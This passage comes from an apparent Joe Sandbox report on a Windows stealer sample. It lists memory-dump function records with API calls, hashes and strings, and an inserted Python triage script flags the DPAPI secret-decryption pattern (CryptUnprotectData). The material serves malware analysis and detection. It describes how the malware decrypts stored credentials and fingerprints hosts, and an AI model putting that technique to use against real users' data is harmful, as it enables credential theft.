                                    • Instruction ID: 1e80134b46d135d1386c26019c147a64aa7478b5a5afacbaf7e33564464c49df
                                    • Opcode Fuzzy Hash: 6c30c74771bd3310fe3249cb954c3cd948a0bc3166f8c496da31d678e1ddf07e
                                    • Instruction Fuzzy Hash: B7B207F36082049FE304AE2DEC8567AFBE9EF94720F16493DE6C5C7744EA3598018697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: TC"$Vh~[$d7~g$d7~g$Rw
                                    • API String ID: 0-2312026313
                                    • Opcode ID: 8e77a25462c5fb417673b8d78985e3649266b09ff0c5247e372bf628478d30bf
                                    • Instruction ID: 0b1fdfa1783cd99e9bfd1f18b149fc063c46f6e54473e8067962d2f98e9ad6d2
                                    • Opcode Fuzzy Hash: 8e77a25462c5fb417673b8d78985e3649266b09ff0c5247e372bf628478d30bf
                                    • Instruction Fuzzy Hash: 46B2D6F3A0C2149FE3046E2DEC8566AFBE9EF94720F1A493DEAC493744E67558008797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: \u$\u${${$}$}
                                    • API String ID: 0-582841131
                                    • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction ID: 41ffde2e3be3ab51b3b6db22ad39ada09351841690f488cc40b12c38ef94f492
                                    • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                    • Instruction Fuzzy Hash: 3F414B12E19BD9C5CB058B7444A02AEBFB26FD6210F6D82AEC49D1B3C2C7B4414AD3A5
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0019C971
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0019C97C
                                    • lstrcat.KERNEL32(?,001B0B47), ref: 0019CA43
                                    • lstrcat.KERNEL32(?,001B0B4B), ref: 0019CA57
                                    • lstrcat.KERNEL32(?,001B0B4E), ref: 0019CA78
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 059111ac4ed2e3c77d6eac9774721a53a064262ae44f2cce2fac85dabd2a389e
                                    • Instruction ID: 3537e1ac6b1d34c3aa0ad184527e024df6603030b08de6e60c93b2a2071643d7
                                    • Opcode Fuzzy Hash: 059111ac4ed2e3c77d6eac9774721a53a064262ae44f2cce2fac85dabd2a389e
                                    • Instruction Fuzzy Hash: A3414F75D0421EDBDB10CFA4DD89BEEB7B8AB48704F1041B8E509A7280E7B45A84CF95
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 001972AD
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001972B4
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001972E1
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00197304
                                    • LocalFree.KERNEL32(?), ref: 0019730E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: c88eeebd312f92c477a7a8f4db430498d3e3190a847d91e92c73322feb2bc2fa
                                    • Instruction ID: 61cdc9c44a0582371dbde64c8dc55cf72fee4a94536ab7a30694df836a65eb04
                                    • Opcode Fuzzy Hash: c88eeebd312f92c477a7a8f4db430498d3e3190a847d91e92c73322feb2bc2fa
                                    • Instruction Fuzzy Hash: A3014CB5A44308BBDB10DFE4DC46F9E7778BB44B04F104154FB05AA2C0D7B0AA008B69
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001A97AE
                                    • Process32First.KERNEL32(001B0ACE,00000128), ref: 001A97C2
                                    • Process32Next.KERNEL32(001B0ACE,00000128), ref: 001A97D7
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 001A97EC
                                    • CloseHandle.KERNEL32(001B0ACE), ref: 001A980A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 5a209397a035b07538d0261cf3410b720609328a4b994c7956029c181798fc0c
                                    • Instruction ID: 0ec8b6870d49ca23866b53daf06891fe9b963f8f5cd9613bc10b5858798b6b28
                                    • Opcode Fuzzy Hash: 5a209397a035b07538d0261cf3410b720609328a4b994c7956029c181798fc0c
                                    • Instruction Fuzzy Hash: D3011E79A14208EBDB24DFA4CD54BEDB7B8BB09704F1045D9E50997240EB749B84CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <7\h$huzx
                                    • API String ID: 0-2989614873
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #A\{$&n:W$Fd5?$K/
                                    • API String ID: 0-1382967124
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 4bMU$YMy$j4 $q{y5
                                    • API String ID: 0-3216817245
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,001951D4,40000001,00000000,00000000,?,001951D4), ref: 001A9050
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00194F3E,00000000,00000000), ref: 0019A23F
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00194F3E,00000000,?), ref: 0019A251
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00194F3E,00000000,00000000), ref: 0019A27A
                                    • LocalFree.KERNEL32(?,?,?,?,00194F3E,00000000,?), ref: 0019A28F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001B0DE8,00000000,?), ref: 001A7B40
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A7B47
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,001B0DE8,00000000,?), ref: 001A7B54
                                    • wsprintfA.USER32 ref: 001A7B83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E2E398,00000000,?,001B0DF8,00000000,?,00000000,00000000), ref: 001A7BF3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A7BFA
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E2E398,00000000,?,001B0DF8,00000000,?,00000000,00000000,?), ref: 001A7C0D
                                    • wsprintfA.USER32 ref: 001A7C47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +u7$1Sc$qG3
                                    • API String ID: 0-552559428
                                    APIs
                                    • CoCreateInstance.COMBASE(001AE120,00000000,00000001,001AE110,00000000), ref: 001A39A8
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001A3A00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0019A2D4
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 0019A2F3
                                    • LocalFree.KERNEL32(?), ref: 0019A323
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 1374bc98f951c2a328a77c9cd8c95784871ecbf84626d7979099149824d86a14
                                    • Instruction ID: aca848e3ee05e142a2a1cb6423ba6b8d459f08844804cbfb27319d29e3c0ac00
                                    • Opcode Fuzzy Hash: 1374bc98f951c2a328a77c9cd8c95784871ecbf84626d7979099149824d86a14
                                    • Instruction Fuzzy Hash: 8311FAB4A00209DFCB04DFA4D885AAEB7B5FF89300F108569ED1597350D770AE50CFA1
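Added example, not part of the Joe Sandbox report and not Joe Sandbox's own code: a small Python triage script for function records in the layout above. It parses the `APIs`/`Strings` listing, recomputes the `API ID` from the call names, and flags the `LocalAlloc`/`CryptUnprotectData`/`LocalFree` sequence that the record with API ID `Local$AllocCryptDataFreeUnprotect` documents, which is how a stealer decrypts DPAPI-protected browser and Windows secrets (the DPAPI output blob must be released with `LocalFree`, and `LocalAlloc` flag `0x40` is the documented `LMEM_ZEROINIT`). The rule used to rebuild the `API ID` (words shared by two or more API names, then `$`, then the remaining words, each group sorted) is inferred from that single record and is an assumption. The sample record text is constructed: the `LocalAlloc`/`LocalFree` lines and the ID fields are copied from the report, while the `CryptUnprotectData` call line and its `ref` address are made up, since the excerpt only implies that call through the API ID.

```python
"""Parse Joe Sandbox-style function records and flag the DPAPI decryption pattern.

Added example. The API-ID reconstruction is an assumption inferred from one
record on the page, not Joe Sandbox's published algorithm.
"""
import re
from collections import Counter

LMEM_ZEROINIT = 0x0040   # documented LocalAlloc flag: return a zero-filled block

CALL_RE = re.compile(
    r'^•\s*(?P<name>[A-Za-z_]\w*)(?:\.(?P<module>[A-Z0-9_]+))?'
    r'\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$')
FIELD_RE = re.compile(r'^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$')

# Constructed sample in the report's layout. LocalAlloc/LocalFree lines and the
# ID fields are from the report; the CryptUnprotectData line and ref 0019A30A
# are constructed (the excerpt only implies the call through the API ID).
SAMPLE = """\
APIs
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0019A2F3
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0019A30A
• LocalFree.KERNEL32(?), ref: 0019A323
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
• String ID:
• API String ID: 2068576380-0
Strings
Similarity
• API ID:
• String ID: xn--
• API String ID: 0-2826155999
"""


def split_words(api_name):
    """Split a CamelCase Win32 name into words; keep CRT helpers such as __aulldiv whole."""
    if api_name == api_name.lower():
        return [api_name]
    return re.findall(r'[A-Z]+[a-z0-9]*|[a-z0-9]+', api_name)


def api_id(api_names):
    """Assumed rule: words shared by two or more names, '$', then the remaining
    words; each group sorted and de-duplicated; no '$' when nothing is shared."""
    bags = [split_words(n) for n in api_names]
    counts = Counter(w for bag in bags for w in set(bag))
    shared = sorted(w for w, c in counts.items() if c > 1)
    unique = sorted({w for bag in bags for w in bag} - set(shared))
    return (''.join(shared) + '$' if shared else '') + ''.join(unique)


def parse_records(text):
    """Turn the flat 'APIs'/'Strings' listing into records with calls and fields."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if line in ('APIs', 'Strings'):
            records.append({'kind': line, 'calls': [], 'fields': {}})
            continue
        if not records:
            continue
        m = CALL_RE.match(line)
        if m:
            records[-1]['calls'].append({
                'name': m['name'], 'module': m['module'] or '',
                'args': [a.strip() for a in m['args'].split(',')], 'ref': m['ref']})
            continue
        m = FIELD_RE.match(line)
        if m:
            records[-1]['fields'][m['key'].strip()] = m['value'].strip()
    return records


def check_api_ids(records):
    """Compare each record's recorded 'API ID' with the one recomputed from its calls."""
    results = []
    for rec in records:
        if rec['calls']:
            computed = api_id([c['name'] for c in rec['calls']])
            recorded = rec['fields'].get('API ID', '')
            results.append((recorded, computed, recorded == computed))
    return results


def triage(records):
    """Flag CryptUnprotectData bracketed by LocalAlloc/LocalFree, plus the IDNA prefix string."""
    findings = []
    for rec in records:
        names = [c['name'] for c in rec['calls']]
        if 'CryptUnprotectData' in names:
            zeroed = any(c['name'] == 'LocalAlloc' and c['args'] and c['args'][0] != '?'
                         and int(c['args'][0], 16) & LMEM_ZEROINIT for c in rec['calls'])
            findings.append({
                'technique': 'DPAPI decryption of stored secrets (CryptUnprotectData)',
                'frees_blob': 'LocalFree' in names,      # DPAPI output must go to LocalFree
                'zero_init_buffer': zeroed,
                'refs': [c['ref'] for c in rec['calls']]})
        if rec['fields'].get('String ID') == 'xn--':
            findings.append({'technique': 'IDNA/punycode host handling (xn-- prefix)', 'refs': []})
    return findings


if __name__ == '__main__':
    recs = parse_records(SAMPLE)
    for recorded, computed, ok in check_api_ids(recs):
        print(f'API ID {recorded!r} recomputed as {computed!r}: {"match" if ok else "MISMATCH"}')
    for finding in triage(recs):
        print(finding)
```

Run stand-alone, the script confirms the recomputed ID matches the report's `Local$AllocCryptDataFreeUnprotect` and prints the finding; the `refs` it returns are the offsets to break on when stepping the unpacked code under a debugger (0019A2F3 and 0019A323 are the report's own, 0019A30A is the constructed one). Records without call lines, such as the `xn--` string record, only contribute string-based findings.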
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &A]~$Oa]
                                    • API String ID: 0-722490193
                                    • Opcode ID: 2b651e6f8fdccf149fe7efcce04b62beb24423fbdbf5bb81d2379c2e49bdbddf
                                    • Instruction ID: 7d253c475dcca388679f68e66206c4b18de1c3b972ee7f66ef3000c7bda5a70d
                                    • Opcode Fuzzy Hash: 2b651e6f8fdccf149fe7efcce04b62beb24423fbdbf5bb81d2379c2e49bdbddf
                                    • Instruction Fuzzy Hash: B3B229F390C2049FE304AE2DEC8567ABBE5EF94320F1A893DEAC4C7744E67558058796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?$__ZN
                                    • API String ID: 0-1427190319
                                    • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction ID: 12f8cad5d1c8923e94fc584ca3e6f7e86530fc0b674da1f70c5f84d4a2a6fcfe
                                    • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction Fuzzy Hash: 2A7223B2928B218BD714CF14C88076FBBE2AFD9310F698A1DF9955B2D2D3709C519F81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: So
                                    • API String ID: 0-3171976996
                                    • Opcode ID: 8387f1f6e5928bb4a253a3b899e5b78e84ce7e7b5bd1322db6526a77912f31b1
                                    • Instruction ID: 3f7a6911530473cb628b4d481d18bd4b0c0721ef50ba6cc01c8f842d0ea182c5
                                    • Opcode Fuzzy Hash: 8387f1f6e5928bb4a253a3b899e5b78e84ce7e7b5bd1322db6526a77912f31b1
                                    • Instruction Fuzzy Hash: 4CB2FAF350C6049FE3046E2DEC85A7ABBE9EF94320F1A493DEAC5C7344EA3558418697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: +|j
                                    • API String ID: 0-833230539
                                    • Opcode ID: 2e61de2d6552ba8a15be0e94968ed47a9ae082da15866e35b19a64e7d85cc3f0
                                    • Instruction ID: 085463dd99226fb73148dc2e717b2b677817ab5bbbce26aa8170779ed346dfe7
                                    • Opcode Fuzzy Hash: 2e61de2d6552ba8a15be0e94968ed47a9ae082da15866e35b19a64e7d85cc3f0
                                    • Instruction Fuzzy Hash: 83B227F3A0C2049FE3046E2DEC8577ABBE5EB94720F1A463DEAC4C3744E63598158697
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: xn--
                                    • API String ID: 0-2826155999
                                    • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction ID: 09b6a47328d324d4a621b40f0a1fa0d040dc782b27e956405eddb494fdada6de
                                    • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction Fuzzy Hash: 83A246B1C00AA88BEF18CB56C8603FDB7B1FF65380F9842AAD55677281D3755E81CB50
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
